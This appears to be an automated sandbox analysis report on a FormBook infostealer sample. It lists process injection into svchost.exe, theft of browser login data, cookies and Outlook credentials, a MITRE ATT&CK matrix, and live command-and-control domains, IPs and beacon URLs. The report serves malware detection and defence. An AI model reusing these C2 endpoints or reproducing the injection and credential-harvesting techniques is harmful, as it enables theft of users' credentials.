          Source: C:\Windows\SysWOW64\choice.exeThread APC queued: target process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BA2008Jump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0043333C mouse_event,mouse_event,0_2_0043333C
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"Jump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
          Source: 8EhMjL3yNF.exe, SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: 8EhMjL3yNF.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: SjhnWvlTMw.exe, 00000004.00000002.708577409614.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000000.705302725243.0000000001491000.00000002.00000001.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708579308354.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004720DB GetLocalTime,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0041E364 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Source: 8EhMjL3yNF.exeBinary or memory string: WIN_XP
          Source: 8EhMjL3yNF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
          Source: 8EhMjL3yNF.exeBinary or memory string: WIN_XPe
          Source: 8EhMjL3yNF.exeBinary or memory string: WIN_VISTA
          Source: 8EhMjL3yNF.exeBinary or memory string: WIN_7
          Source: 8EhMjL3yNF.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0046CEF3 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job2
          Valid Accounts          		1
          Abuse Elevation Control Mechanism          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Email Collection          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
          Valid Accounts          		2
          Obfuscated Files or Information          		NTDS16
          System Information Discovery          		Distributed Component Object Model21
          Input Capture          		4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
          Access Token Manipulation          		1
          DLL Side-Loading          		LSA Secrets141
          Security Software Discovery          		SSH3
          Clipboard Data          		Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
          Process Injection          		2
          Valid Accounts          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529811 Sample: 8EhMjL3yNF.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 28 www.sealofsea.xyz 2->28 30 www.languyenthuyduyen.xyz 2->30 32 25 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 3 other signatures 2->50 10 8EhMjL3yNF.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 SjhnWvlTMw.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 choice.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 SjhnWvlTMw.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.languyenthuyduyen.xyz 103.255.237.233, 49826, 49827, 49828 VNPT-AS-VNVNPTCorpVN Viet Nam 22->34 36 agilizeimob.app 84.32.84.32, 49862, 49863, 49864 NTT-LT-ASLT Lithuania 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          8EhMjL3yNF.exe100%AviraHEUR/AGEN.1321671
          8EhMjL3yNF.exe58%ReversingLabsWin32.Trojan.Autoitinject
          8EhMjL3yNF.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.languyenthuyduyen.xyz
          		103.255.237.233
          		truetrue
            		unknown
            www.ntn.solar
            		199.59.243.227
            		truetrue
              		unknown
              asociacia.online
              		81.2.196.19
              		truetrue
                		unknown
                mybartendinglife.club
                		3.33.130.190
                		truetrue
                  		unknown
                  technew.shop
                  		45.56.219.238
                  		truetrue
                    		unknown
                    thepeatear.online
                    		84.32.84.32
                    		truetrue
                      		unknown
                      www.firstcry.shop
                      		13.248.169.48
                      		truetrue
                        		unknown
                        shops.myshopify.com
                        		23.227.38.74
                        		truetrue
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truetrue
                            		unknown
                            doggieradio.net
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.allpop.xyz
                              		162.0.238.43
                              		truetrue
                                		unknown
                                agilizeimob.app
                                		84.32.84.32
                                		truetrue
                                  		unknown
                                  030002304.xyz
                                  		65.21.196.90
                                  		truetrue
                                    		unknown
                                    www.kx507981.shop
                                    		54.67.42.145
                                    		truetrue
                                      		unknown
                                      www.bayarcepat19.click
                                      		104.21.77.69
                                      		truetrue
                                        		unknown
                                        teerra.shop
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          www.mybartendinglife.club
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.030002304.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.sealofsea.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.thepeatear.online
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.doggieradio.net
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.agilizeimob.app
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.zingara.life
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.technew.shop
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.asociacia.online
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.teerra.shop
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.technew.shop/n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs=true
                                                                		unknown
                                                                http://www.doggieradio.net/0r1y/true
                                                                  		unknown
                                                                  http://www.firstcry.shop/2mvq/?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307Ptrue
                                                                    		unknown
                                                                    http://www.mybartendinglife.club/sfkd/true
                                                                      		unknown
                                                                      http://www.bayarcepat19.click/x7ji/true
                                                                        		unknown
                                                                        http://www.thepeatear.online/1jig/true
                                                                          		unknown
                                                                          http://www.mybartendinglife.club/sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8=true
                                                                            		unknown
                                                                            http://www.kx507981.shop/7cee/?nhl=LO11cYuPDN+V6ulgbSQlbQhpKz952Uhe3dYdUk54a5ewrOC/uvvn5bRLfbUUmCEUWVML7qGOWOxZJM3qSQiiVpBT5y4/s1qW1sM6t7L30BdH3o50b80t3Z0=&9X=EvKH2xeP-DpP307Ptrue
                                                                              		unknown
                                                                              http://www.languyenthuyduyen.xyz/zxna/true
                                                                                		unknown
                                                                                http://www.030002304.xyz/f06i/?9X=EvKH2xeP-DpP307P&nhl=g1MS1+fiN19fuwYlcBKOU4UzmmsLW0eBYO/90R9nimGtqEGAgI0kE5yyF7WRrE+n+De2SPMKz1ZHlS6i60EYe6+HnhjgGN2ua7X3RkxuKgzxjrOTLKTNX9U=true
                                                                                  		unknown
                                                                                  http://www.zingara.life/c0mi/?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y=true
                                                                                    		unknown
                                                                                    http://www.teerra.shop/77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307Ptrue
                                                                                      		unknown
                                                                                      http://www.firstcry.shop/2mvq/true
                                                                                        		unknown
                                                                                        http://www.030002304.xyz/f06i/true
                                                                                          		unknown
                                                                                          http://www.agilizeimob.app/51t8/true
                                                                                            		unknown
                                                                                            http://www.technew.shop/n2yx/true
                                                                                              		unknown
                                                                                              http://www.doggieradio.net/0r1y/?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307Ptrue
                                                                                                		unknown
                                                                                                http://www.ntn.solar/udtr/?nhl=JWRCMib9Ab6yKGK9tVnY1k7oTlzf3FlCZv+JaD8ekJd2eSGus8uX9j1aomNbYcA4VfgdKRJwSCfsWTeuLYlP9NwC5xq+bIEo1S2z3eaxb1ZDoYcdhdFludY=&9X=EvKH2xeP-DpP307Ptrue
                                                                                                  		unknown
                                                                                                  http://www.teerra.shop/77wx/true
                                                                                                    		unknown
                                                                                                    http://www.sealofsea.xyz/a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY=true
                                                                                                      		unknown
                                                                                                      http://www.kx507981.shop/7cee/true
                                                                                                        		unknown
                                                                                                        http://www.languyenthuyduyen.xyz/zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4=true
                                                                                                          		unknown
                                                                                                          http://www.zingara.life/c0mi/true
                                                                                                            		unknown
                                                                                                            http://www.allpop.xyz/w6me/?nhl=ZQVtGrOiyfGmX0Bj7aOLb6McZZRaKXEecgRoMf1rX1qYBYk54P5+D+BVBTSMCHRrFOCnGQPC2mKGS9yi7bLDo6yarw5+jQ0DwziRuqiIpXFZxXsIN5XtUDU=&9X=EvKH2xeP-DpP307Ptrue
                                                                                                              		unknown
                                                                                                              http://www.agilizeimob.app/51t8/?nhl=m7B14gWZ3tTp+Si7ZmYNMzAQVPiIRhKeZLAtkzFkwSvyWpqHTy62LwfcTz9vRoaiRTwb/KbEqTho7SSr6qx+JXj6A7Si0P86LNCZt8nEBft2KH0FBAqzAzY=&9X=EvKH2xeP-DpP307Ptrue
                                                                                                                		unknown
                                                                                                                http://www.allpop.xyz/w6me/true
                                                                                                                  		unknown
                                                                                                                  http://www.ntn.solar/udtr/true
                                                                                                                    		unknown

                                                                                                                    URLs from Memory and Binaries

                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                    https://duckduckgo.com/chrome_newtabchoice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchchoice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://duckduckgo.com/ac/?q=choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2Vdchoice.exe, 00000005.00000002.708581961090.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.00000000036C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.agilizeimob.appSjhnWvlTMw.exe, 00000006.00000002.708576743698.0000000000F63000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.google.comchoice.exe, 00000005.00000002.708581961090.00000000064C2000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000003EA2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://x1.c.lencr.org/0firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://x1.i.lencr.org/0firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://c.pki.goog/r/r1.crl0firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://i.pki.goog/r1.crt0firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://ocsp.rootca1.amazontrust.com0:firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://www.ecosia.org/newtab/choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://kx507945.shopchoice.exe, 00000005.00000002.708581961090.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.000000000467C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.google.com/favicon.icochoice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://zingara.life/c0mi?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zschoice.exe, 00000005.00000002.708581961090.0000000006978000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000004358000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
